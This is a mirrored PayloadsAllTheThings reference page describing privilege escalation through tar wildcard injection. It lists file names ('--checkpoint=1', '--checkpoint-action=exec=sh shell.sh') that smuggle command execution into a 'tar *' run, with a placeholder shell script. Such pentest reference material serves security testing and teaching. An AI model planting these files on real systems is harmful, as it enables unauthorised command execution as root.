Mirrors/PayloadsAllTheThings
2
0
Fork 0
mirror of https://github.com/swisskyrepo/PayloadsAllTheThings.git synced 2024-12-15 07:42:57 +00:00
Code Issues Projects Releases Packages Wiki Activity
PayloadsAllTheThings/Tar commands execution/README.md
Swissky 65654f81a4 Markdown formatting update
2018-08-12 23:30:22 +02:00

19 lines
No EOL
915 B
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# TAR Command Execution
By using tar with checkpoint-action options, a specified action can be used after a checkpoint. This action could be a malicious shell script that could be used for executing arbitrary commands under the user who starts tar. “Tricking” root to use the specific options is quite easy, and thats where the wildcard comes in handy.
## Exploit
These files work against a "tar *"
```powershell
--checkpoint=1
--checkpoint-action=exec=sh shell.sh
shell.sh (your exploit code is here)
```
## Thanks to
* [Exploiting wildcards on Linux - Berislav Kucan](https://www.helpnetsecurity.com/2014/06/27/exploiting-wildcards-on-linux/)
* [Code Execution With Tar Command - p4pentest](http://p4pentest.in/2016/10/19/code-execution-with-tar-command/)
* [Back To The Future: Unix Wildcards Gone Wild - Leon Juranic](http://www.defensecode.com/public/DefenseCode_Unix_WildCards_Gone_Wild.txt)
Reference in a new issue View git blame Copy permalink